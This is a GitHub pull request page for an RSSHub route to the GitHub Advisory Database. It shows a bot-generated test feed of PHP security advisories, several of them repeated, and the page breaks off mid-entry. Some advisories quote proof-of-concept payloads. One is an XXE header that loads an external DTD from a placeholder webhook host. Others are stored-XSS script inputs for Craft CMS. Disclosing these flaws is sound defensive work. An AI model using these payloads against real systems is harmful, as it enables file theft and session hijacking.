feat(github): 添加 GitHub Advisory Database RSS 路由 #16745
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sd0ric4
changed the title
github-actions
bot
added
the
Auto: Route Test Complete
|
Successfully generated as following: http://localhost:1200/github-advisor/data - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - composer</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - composer - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:19:16 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) </p>
<h3 id="details">Details</h3>
<p>Check <code> $pattern = '/encoding="(.*?)"/';</code> easy to bypass. Just use a single quote symbol <code>'</code>. So payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. </p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> to</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive the request to your <code>http://%webhook%/file.dtd</code></li>
<li>Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) </p>
<h3 id="details">Details</h3>
<p>Check <code> $pattern = '/encoding="(.*?)"/';</code> easy to bypass. Just use a single quote symbol <code>'</code>. So payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. </p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> to</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive the request to your <code>http://%webhook%/file.dtd</code></li>
<li>Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[damienharper/auditor-bundle] auditor-bundle vulnerable to Cross-site Scripting because name of entity does not get escaped</title>
<description><h3 id="summary">Summary</h3>
<p>Unescaped entity property enables Javascript injection.</p>
<h3 id="details">Details</h3>
<p>I think this is possible because %source_label% in twig macro is not escaped. Therefore script tags can be inserted and are executed.</p>
<h3 id="poc">PoC</h3>
<ul>
<li>clone example project <a href="https://github.com/DamienHarper/auditor-bundle-demo">https://github.com/DamienHarper/auditor-bundle-demo</a></li>
<li>create author with FullName </li>
<li>delete author</li>
<li>view audit of authors</li>
<li>alert is displayed</li>
</ul>
<h3 id="impact">Impact</h3>
<p>persistent XSS. JS can be injected and executed.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67">https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67</a></li>
<li><a href="https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1">https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45592">https://nvd.nist.gov/vuln/detail/CVE-2024-45592</a></li>
<li><a href="https://github.com/advisories/GHSA-78vg-7v27-hj67">https://github.com/advisories/GHSA-78vg-7v27-hj67</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-78vg-7v27-hj67</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-78vg-7v27-hj67</guid>
<author>GitHub</author>
</item>
<item>
<title>[topthink/framework] ThinkPHP deserialization vulnerability</title>
<description><p>A deserialization vulnerability in Thinkphp v6.1.3 to v8.0.4 allows attackers to execute arbitrary code.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-44902">https://nvd.nist.gov/vuln/detail/CVE-2024-44902</a></li>
<li><a href="https://github.com/fru1ts/CVE-2024-44902">https://github.com/fru1ts/CVE-2024-44902</a></li>
<li><a href="http://thinkphp.com/">http://thinkphp.com</a></li>
<li><a href="https://github.com/advisories/GHSA-f4wh-359g-4pq7">https://github.com/advisories/GHSA-f4wh-359g-4pq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f4wh-359g-4pq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f4wh-359g-4pq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[craftcms/cms] Craft CMS vulnerable to stored XSS in breadcrumb list and title fields</title>
<description><h3 id="summary">Summary</h3>
<p>Multiple Stored XSS can be triggered by the breadcrumb list and title fields with user input.</p>
<h3 id="details">Details</h3>
<ol>
<li>In the <strong>/admin/categories</strong> page, category title isn't sanitized and triggered xss.</li>
<li>In the category edit page under the <strong>/admin/categories/</strong>, category title in breadcrumb list isn't sanitized and triggered xss.</li>
<li>In the <strong>/admin/entries</strong> page, entry title isn't sanitized and triggered xss.</li>
<li>In the entry edit page under the <strong>/admin/entries/</strong>, entry title in breadcrumb list isn't sanitized and triggered xss.</li>
<li>In the <strong>/admin/myaccount</strong> and pages under it, username or full name in breadcrumb list isn't sanitized and triggered xss.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Malicious users can tamper with the control panel.</p>
<h3 id="poc">PoC</h3>
<h4 id="1-in-the-admincategories-page-category-title-isnt-sanitized-and-triggered-xss">1. In the <strong>/admin/categories</strong> page, category title isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Categories ( /admin/settings/categories )
2. Create new category group
3. Access to the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access to the Categories page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/4e0f35c7-fbb0-4d38-a0b5-9e28750ff706" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e046b9db-d83c-4f81-ad91-165c5afedeb9" referrerpolicy="no-referrer"></p>
<h4 id="2-in-the-category-edit-page-under-the-admincategories-category-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">2. In the category edit page under the <strong>/admin/categories/</strong>, category title in breadcrumb list isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Categories ( /admin/settings/categories )
2. Create new category group
3. Access to the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access to the Category edit page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f7543a11-58eb-4099-9ee2-3461816c52ea" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f01bbb80-4417-42ca-bf51-b38860f6c74a" referrerpolicy="no-referrer"></p>
<h4 id="3-in-the-adminentries-page-entry-title-isnt-sanitized-and-triggered-xss">3. In the <strong>/admin/entries</strong> page, entry title isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create new entry type
3. Access to the Settings -&gt; Sections ( /admin/settings/sections )
4. Create new section
5. Access to the Entries page ( /admin/entries )
6. Push the New entry button
7. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access to the Entries page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b255a999-e48c-46be-b732-4482ea9cee9a" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/445d8e0c-71b6-49c7-8f4a-37541dcc9c85" referrerpolicy="no-referrer"></p>
<h4 id="4-in-the-entry-edit-page-under-the-adminentries-entry-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">4. In the entry edit page under the <strong>/admin/entries/</strong>, entry title in breadcrumb list isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create new entry type
3. Access to the Settings -&gt; Sections ( /admin/settings/sections )
4. Create new section
5. Access to the Entries page ( /admin/entries )
6. Push the New entry button
7. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access to the Entriy edit page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a59a122b-b9e7-4695-be13-eb8a1c2d36df" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b0d27446-7ac6-47e7-ac02-20c924698b13" referrerpolicy="no-referrer"></p>
<h4 id="5-in-the-adminmyaccount-and-pages-under-it-username-or-full-name-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">5. In the <strong>/admin/myaccount</strong> and pages under it, username or full name in breadcrumb list isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the My Account Page ( /admin/myaccount )
2. Input the Full Name column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
3. Push the the Save button
4. Access to the My Account page ( /admin/myaccount ) or pages under it ( /admin/myaccount/addresses , /admin/myaccount/preferences , etc.) and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/3be45bdd-0757-42a8-bc5d-320ab2339fd0" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e1be7446-1c54-42bc-af9a-a8ac81a2d7bf" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/5fa06b26-fecd-40f5-bc8b-171f881f8a2a" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42">https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42</a></li>
<li><a href="https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8">https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45406">https://nvd.nist.gov/vuln/detail/CVE-2024-45406</a></li>
<li><a href="https://github.com/advisories/GHSA-28h4-788g-rh42">https://github.com/advisories/GHSA-28h4-788g-rh42</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-28h4-788g-rh42</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-28h4-788g-rh42</guid>
<author>GitHub</author>
</item>
<item>
<title>[nategood/httpful] Httpful is Missing Certificate Validation</title>
<description><p>Httpful has Insecure HTTPS Connections due to Missing Default Certificate Validation</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/nategood/httpful/issues/247">https://github.com/nategood/httpful/issues/247</a></li>
<li><a href="https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84">https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84</a></li>
<li><a href="https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml">https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml</a></li>
<li><a href="https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35">https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35</a></li>
<li><a href="https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb">https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb</a></li>
<li><a href="https://github.com/advisories/GHSA-gcfg-hmwx-wq5h">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</guid>
<author>GitHub</author>
</item>
<item>
<title>[twbs/bootstrap] Bootstrap Cross-Site Scripting (XSS) vulnerability</title>
<description><p>A vulnerability has been identified in Bootstrap that exposes users to Cross-Site Scripting (XSS) attacks. The issue is present in the carousel component, where the data-slide and data-slide-to attributes can be exploited through the href attribute of an <a> tag due to inadequate sanitization. This vulnerability could potentially enable attackers to execute arbitrary JavaScript within the victim's browser.</a></p><a>
<h3 id="references">References</h3>
</a><ul><a>
</a><li><a></a><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-6531">https://nvd.nist.gov/vuln/detail/CVE-2024-6531</a></li>
<li><a href="https://www.herodevs.com/vulnerability-directory/cve-2024-6531">https://www.herodevs.com/vulnerability-directory/cve-2024-6531</a></li>
<li><a href="https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml">https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml</a></li>
<li><a href="https://github.com/advisories/GHSA-vc8w-jr9v-vj7f">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</guid>
<author>GitHub</author>
</item>
<item>
<title>[reportico-web/reportico] SQL Injection vulnerability in Reportico Till</title>
<description><p>SQL Injection vulnerability in Reportico Till 8.1.0 allows attackers to obtain sensitive information or other system information via the project parameter.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-47438">https://nvd.nist.gov/vuln/detail/CVE-2023-47438</a></li>
<li><a href="https://github.com/reportico-web/reportico/issues/52">https://github.com/reportico-web/reportico/issues/52</a></li>
<li><a href="https://github.com/advisories/GHSA-jjf4-959w-f545">https://github.com/advisories/GHSA-jjf4-959w-f545</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jjf4-959w-f545</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jjf4-959w-f545</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information</title>
<description><h3 id="summary">Summary</h3>
<p><code>\PhpOffice\PhpSpreadsheet\Writer\Html</code> doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.</p>
<h3 id="poc">PoC</h3>
<p>Example target script:</p>
<pre><code>&lt;?php
require 'vendor/autoload.php';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader-&gt;load(__DIR__ . '/book.xlsx');
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer-&gt;generateHTMLAll());
</code></pre>
<p>Save this file in the same directory:
<a href="https://github.com/PHPOffice/PhpSpreadsheet/files/15212797/book.xlsx">book.xlsx</a></p>
<p>Open index.php in a web browser. An alert should be displayed.</p>
<h3 id="impact">Impact</h3>
<p>Full takeover of the session of users viewing spreadsheet files as HTML.</p>
<h3 id="references">References</h3>
<ul>
